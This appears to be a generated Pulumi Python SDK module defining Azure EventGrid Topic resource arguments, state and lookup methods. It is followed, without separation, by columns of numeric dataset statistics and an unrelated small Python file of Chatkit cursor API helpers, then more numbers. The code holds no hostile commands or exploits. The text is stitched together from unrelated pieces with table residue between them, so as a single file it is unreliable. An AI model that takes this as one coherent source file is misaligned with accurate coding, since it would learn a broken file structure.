:param pulumi.Input['TopicInputMappingFieldsArgs'] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[bool] local_auth_enabled: Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if identity is not None:
pulumi.set(__self__, "identity", identity)
if inbound_ip_rules is not None:
pulumi.set(__self__, "inbound_ip_rules", inbound_ip_rules)
if input_mapping_default_values is not None:
pulumi.set(__self__, "input_mapping_default_values", input_mapping_default_values)
if input_mapping_fields is not None:
pulumi.set(__self__, "input_mapping_fields", input_mapping_fields)
if input_schema is not None:
pulumi.set(__self__, "input_schema", input_schema)
if local_auth_enabled is not None:
pulumi.set(__self__, "local_auth_enabled", local_auth_enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def identity(self) -> Optional[pulumi.Input['TopicIdentityArgs']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@identity.setter
def identity(self, value: Optional[pulumi.Input['TopicIdentityArgs']]):
pulumi.set(self, "identity", value)
@property
@pulumi.getter(name="inboundIpRules")
def inbound_ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]]:
"""
One or more `inbound_ip_rule` blocks as defined below.
"""
return pulumi.get(self, "inbound_ip_rules")
@inbound_ip_rules.setter
def inbound_ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]]):
pulumi.set(self, "inbound_ip_rules", value)
@property
@pulumi.getter(name="inputMappingDefaultValues")
def input_mapping_default_values(self) -> Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']]:
"""
A `input_mapping_default_values` block as defined below.
"""
return pulumi.get(self, "input_mapping_default_values")
@input_mapping_default_values.setter
def input_mapping_default_values(self, value: Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']]):
pulumi.set(self, "input_mapping_default_values", value)
@property
@pulumi.getter(name="inputMappingFields")
def input_mapping_fields(self) -> Optional[pulumi.Input['TopicInputMappingFieldsArgs']]:
"""
A `input_mapping_fields` block as defined below.
"""
return pulumi.get(self, "input_mapping_fields")
@input_mapping_fields.setter
def input_mapping_fields(self, value: Optional[pulumi.Input['TopicInputMappingFieldsArgs']]):
pulumi.set(self, "input_mapping_fields", value)
@property
@pulumi.getter(name="inputSchema")
def input_schema(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "input_schema")
@input_schema.setter
def input_schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "input_schema", value)
@property
@pulumi.getter(name="localAuthEnabled")
def local_auth_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
"""
return pulumi.get(self, "local_auth_enabled")
@local_auth_enabled.setter
def local_auth_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "local_auth_enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _TopicState:
def __init__(__self__, *,
endpoint: Optional[pulumi.Input[str]] = None,
identity: Optional[pulumi.Input['TopicIdentityArgs']] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]] = None,
input_mapping_default_values: Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']] = None,
input_mapping_fields: Optional[pulumi.Input['TopicInputMappingFieldsArgs']] = None,
input_schema: Optional[pulumi.Input[str]] = None,
local_auth_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
primary_access_key: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
secondary_access_key: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Topic resources.
:param pulumi.Input[str] endpoint: The Endpoint associated with the EventGrid Topic.
:param pulumi.Input['TopicIdentityArgs'] identity: An `identity` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input['TopicInputMappingDefaultValuesArgs'] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input['TopicInputMappingFieldsArgs'] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[bool] local_auth_enabled: Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] primary_access_key: The Primary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] secondary_access_key: The Secondary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if identity is not None:
pulumi.set(__self__, "identity", identity)
if inbound_ip_rules is not None:
pulumi.set(__self__, "inbound_ip_rules", inbound_ip_rules)
if input_mapping_default_values is not None:
pulumi.set(__self__, "input_mapping_default_values", input_mapping_default_values)
if input_mapping_fields is not None:
pulumi.set(__self__, "input_mapping_fields", input_mapping_fields)
if input_schema is not None:
pulumi.set(__self__, "input_schema", input_schema)
if local_auth_enabled is not None:
pulumi.set(__self__, "local_auth_enabled", local_auth_enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if primary_access_key is not None:
pulumi.set(__self__, "primary_access_key", primary_access_key)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if secondary_access_key is not None:
pulumi.set(__self__, "secondary_access_key", secondary_access_key)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The Endpoint associated with the EventGrid Topic.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def identity(self) -> Optional[pulumi.Input['TopicIdentityArgs']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@identity.setter
def identity(self, value: Optional[pulumi.Input['TopicIdentityArgs']]):
pulumi.set(self, "identity", value)
@property
@pulumi.getter(name="inboundIpRules")
def inbound_ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]]:
"""
One or more `inbound_ip_rule` blocks as defined below.
"""
return pulumi.get(self, "inbound_ip_rules")
@inbound_ip_rules.setter
def inbound_ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]]):
pulumi.set(self, "inbound_ip_rules", value)
@property
@pulumi.getter(name="inputMappingDefaultValues")
def input_mapping_default_values(self) -> Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']]:
"""
A `input_mapping_default_values` block as defined below.
"""
return pulumi.get(self, "input_mapping_default_values")
@input_mapping_default_values.setter
def input_mapping_default_values(self, value: Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']]):
pulumi.set(self, "input_mapping_default_values", value)
@property
@pulumi.getter(name="inputMappingFields")
def input_mapping_fields(self) -> Optional[pulumi.Input['TopicInputMappingFieldsArgs']]:
"""
A `input_mapping_fields` block as defined below.
"""
return pulumi.get(self, "input_mapping_fields")
@input_mapping_fields.setter
def input_mapping_fields(self, value: Optional[pulumi.Input['TopicInputMappingFieldsArgs']]):
pulumi.set(self, "input_mapping_fields", value)
@property
@pulumi.getter(name="inputSchema")
def input_schema(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "input_schema")
@input_schema.setter
def input_schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "input_schema", value)
@property
@pulumi.getter(name="localAuthEnabled")
def local_auth_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
"""
return pulumi.get(self, "local_auth_enabled")
@local_auth_enabled.setter
def local_auth_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "local_auth_enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="primaryAccessKey")
def primary_access_key(self) -> Optional[pulumi.Input[str]]:
"""
The Primary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "primary_access_key")
@primary_access_key.setter
def primary_access_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "primary_access_key", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="secondaryAccessKey")
def secondary_access_key(self) -> Optional[pulumi.Input[str]]:
"""
The Secondary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "secondary_access_key")
@secondary_access_key.setter
def secondary_access_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secondary_access_key", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Topic(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
identity: Optional[pulumi.Input[pulumi.InputType['TopicIdentityArgs']]] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
local_auth_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an EventGrid Topic
> **Note:** at this time EventGrid Topic's are only available in a limited number of regions.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_topic = azure.eventgrid.Topic("exampleTopic",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"environment": "Production",
})
```
## Import
EventGrid Topic's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:eventgrid/topic:Topic topic1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.EventGrid/topics/topic1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['TopicIdentityArgs']] identity: An `identity` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[bool] local_auth_enabled: Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TopicArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an EventGrid Topic
> **Note:** at this time EventGrid Topic's are only available in a limited number of regions.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_topic = azure.eventgrid.Topic("exampleTopic",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"environment": "Production",
})
```
## Import
EventGrid Topic's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:eventgrid/topic:Topic topic1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.EventGrid/topics/topic1
```
:param str resource_name: The name of the resource.
:param TopicArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TopicArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
identity: Optional[pulumi.Input[pulumi.InputType['TopicIdentityArgs']]] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
local_auth_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TopicArgs.__new__(TopicArgs)
__props__.__dict__["identity"] = identity
__props__.__dict__["inbound_ip_rules"] = inbound_ip_rules
__props__.__dict__["input_mapping_default_values"] = input_mapping_default_values
__props__.__dict__["input_mapping_fields"] = input_mapping_fields
__props__.__dict__["input_schema"] = input_schema
__props__.__dict__["local_auth_enabled"] = local_auth_enabled
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["endpoint"] = None
__props__.__dict__["primary_access_key"] = None
__props__.__dict__["secondary_access_key"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure:eventhub/eventGridTopic:EventGridTopic")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Topic, __self__).__init__(
'azure:eventgrid/topic:Topic',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
endpoint: Optional[pulumi.Input[str]] = None,
identity: Optional[pulumi.Input[pulumi.InputType['TopicIdentityArgs']]] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
local_auth_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
primary_access_key: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
secondary_access_key: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Topic':
"""
Get an existing Topic resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] endpoint: The Endpoint associated with the EventGrid Topic.
:param pulumi.Input[pulumi.InputType['TopicIdentityArgs']] identity: An `identity` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TopicInboundIpRuleArgs']]]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input[pulumi.InputType['TopicInputMappingDefaultValuesArgs']] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input[pulumi.InputType['TopicInputMappingFieldsArgs']] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[bool] local_auth_enabled: Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] primary_access_key: The Primary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] secondary_access_key: The Secondary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _TopicState.__new__(_TopicState)
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["identity"] = identity
__props__.__dict__["inbound_ip_rules"] = inbound_ip_rules
__props__.__dict__["input_mapping_default_values"] = input_mapping_default_values
__props__.__dict__["input_mapping_fields"] = input_mapping_fields
__props__.__dict__["input_schema"] = input_schema
__props__.__dict__["local_auth_enabled"] = local_auth_enabled
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["primary_access_key"] = primary_access_key
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["secondary_access_key"] = secondary_access_key
__props__.__dict__["tags"] = tags
return Topic(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
The Endpoint associated with the EventGrid Topic.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter
def identity(self) -> pulumi.Output[Optional['outputs.TopicIdentity']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter(name="inboundIpRules")
def inbound_ip_rules(self) -> pulumi.Output[Optional[Sequence['outputs.TopicInboundIpRule']]]:
"""
One or more `inbound_ip_rule` blocks as defined below.
"""
return pulumi.get(self, "inbound_ip_rules")
@property
@pulumi.getter(name="inputMappingDefaultValues")
def input_mapping_default_values(self) -> pulumi.Output[Optional['outputs.TopicInputMappingDefaultValues']]:
"""
A `input_mapping_default_values` block as defined below.
"""
return pulumi.get(self, "input_mapping_default_values")
@property
@pulumi.getter(name="inputMappingFields")
def input_mapping_fields(self) -> pulumi.Output[Optional['outputs.TopicInputMappingFields']]:
"""
A `input_mapping_fields` block as defined below.
"""
return pulumi.get(self, "input_mapping_fields")
@property
@pulumi.getter(name="inputSchema")
def input_schema(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "input_schema")
@property
@pulumi.getter(name="localAuthEnabled")
def local_auth_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether local authentication methods is enabled for the EventGrid Topic. Defaults to `true`.
"""
return pulumi.get(self, "local_auth_enabled")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="primaryAccessKey")
def primary_access_key(self) -> pulumi.Output[str]:
"""
The Primary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "primary_access_key")
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="secondaryAccessKey")
def secondary_access_key(self) -> pulumi.Output[str]:
"""
The Secondary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "secondary_access_key")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 50.822985
| 294
| 0.684714
| 4,483
| 38,473
| 5.634397
| 0.053759
| 0.083178
| 0.081238
| 0.039194
| 0.922206
| 0.906172
| 0.890455
| 0.880478
| 0.8745
| 0.87066
| 0
| 0.002822
| 0.217061
| 38,473
| 756
| 295
| 50.890212
| 0.835735
| 0.341278
| 0
| 0.791667
| 1
| 0
| 0.149743
| 0.068783
| 0
| 0
| 0
| 0
| 0
| 1
| 0.164352
| false
| 0.002315
| 0.016204
| 0
| 0.280093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c99cf2cb472871c625549ab7d8e2c6097697d79
| 1,005
|
py
|
Python
|
chatkit_python_sdk/cursors.py
|
icappello-zg/chatkit-python-sdk
|
1a90924f5b4dd51b7a0166e0f5e95cac5b8577d4
|
[
"MIT"
] | 1
|
2018-10-19T09:02:25.000Z
|
2018-10-19T09:02:25.000Z
|
chatkit_python_sdk/cursors.py
|
icappello-zg/chatkit_python_sdk
|
1a90924f5b4dd51b7a0166e0f5e95cac5b8577d4
|
[
"MIT"
] | null | null | null |
chatkit_python_sdk/cursors.py
|
icappello-zg/chatkit_python_sdk
|
1a90924f5b4dd51b7a0166e0f5e95cac5b8577d4
|
[
"MIT"
] | null | null | null |
# coding=utf-8
import chatkit_python_sdk.base as base
def set_cursor(chatkit_access_data, room_id, user_id, message_id):
endpoint_parts = ['cursors', '0', 'rooms', room_id, 'users', user_id]
parameters = {
"position": message_id
}
return base.chatkit_cursor_request(chatkit_access_data, endpoint_parts, method="PUT", json_parameters=parameters)
def get_cursor(chatkit_access_data, room_id, user_id):
endpoint_parts = ['cursors', '0', 'rooms', room_id, 'users', user_id]
return base.chatkit_cursor_request(chatkit_access_data, endpoint_parts, method="GET")
def get_cursors_by_user(chatkit_access_data, user_id):
endpoint_parts = ['cursors', '0', 'users', user_id]
return base.chatkit_cursor_request(chatkit_access_data, endpoint_parts, method="GET")
def get_cursors_by_room(chatkit_access_data, room_id):
endpoint_parts = ['cursors', '0', 'rooms', room_id]
return base.chatkit_cursor_request(chatkit_access_data, endpoint_parts, method="GET")
| 30.454545
| 117
| 0.747264
| 141
| 1,005
| 4.921986
| 0.234043
| 0.149856
| 0.195965
| 0.126801
| 0.801153
| 0.770893
| 0.731988
| 0.731988
| 0.587896
| 0.587896
| 0
| 0.005747
| 0.134328
| 1,005
| 32
| 118
| 31.40625
| 0.791954
| 0.01194
| 0
| 0.3125
| 0
| 0
| 0.082745
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.0625
| 0
| 0.5625
